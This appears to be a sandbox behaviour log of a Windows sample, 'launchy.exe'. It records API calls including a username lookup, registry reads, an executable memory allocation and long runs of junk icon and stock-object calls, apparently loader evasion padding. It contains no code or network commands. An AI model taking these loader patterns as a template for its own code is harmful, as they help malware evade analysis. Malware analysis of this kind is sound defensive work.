# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 25.06.2020 08:00:20.893 Process: id = "1" image_name = "launchy.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\launchy.exe" page_root = "0x4a27f000" os_pid = "0xaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x25c [0029.298] LoadCursorW (hInstance=0x0, lpCursorName=0x257f) returned 0x0 [0029.298] GetUserNameA (in: lpBuffer=0x18ff18, pcbBuffer=0x18ff84 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18ff84) returned 1 [0029.359] GetEnhMetaFileA (lpName="u7968o987uyte444") returned 0x0 [0029.360] GetLastError () returned 0x2 [0029.360] LoadIconA (hInstance=0x0, lpIconName=0x7f04) returned 0x1002f [0029.360] DeleteMetaFile (hmf=0x1) returned 0 [0029.367] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0029.367] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0029.367] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x50b818 | out: phkResult=0x50b818*=0x9a) returned 0x0 [0029.368] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0029.368] RegQueryValueExA (in: hKey=0x9a, lpValueName="", lpReserved=0x0, lpType=0x18febc, lpData=0x18fdf0, lpcbData=0x50b3e8*=0xc8 | out: lpType=0x18febc*=0x1, lpData="IEnumConnections", lpcbData=0x50b3e8*=0x11) returned 0x0 [0029.368] LoadLibraryA (lpLibFileName="kernel32") returned 0x76d30000 [0029.369] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0029.369] VirtualAlloc (lpAddress=0x0, dwSize=0xf000, flAllocationType=0x3000, flProtect=0x40) returned 0x210000 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x24a7) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.369] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.370] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.371] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.372] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.373] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.374] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.375] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.376] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.377] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.378] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.379] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.380] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.381] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.381] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.381] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0029.382] GetKeyState (nVirtKey=1) returned 0 [0029.384] GetStretchBltMode (hdc=0x1) returned 0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.384] GetKeyState (nVirtKey=1) returned 0 [0029.384] GetStretchBltMode (hdc=0x1) returned 0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.384] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.385] GetKeyState (nVirtKey=1) returned 0 [0029.385] GetStretchBltMode (hdc=0x1) returned 0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.385] GetKeyState (nVirtKey=1) returned 0 [0029.385] GetStretchBltMode (hdc=0x1) returned 0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.385] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.386] GetKeyState (nVirtKey=1) returned 0 [0029.386] GetStretchBltMode (hdc=0x1) returned 0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.386] GetKeyState (nVirtKey=1) returned 0 [0029.386] GetStretchBltMode (hdc=0x1) returned 0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.386] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetListBoxInfo (hwnd=0x0) returned 0x0 [0029.387] GetKeyState (nVirtKey=1) returned 0 [0029.387] GetStretchBltMode (hdc=0x1) returned 0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetStockObject (i=789644) returned 0x0 [0029.387] GetListBoxInfo (hwnd=0x0) returned 0x0 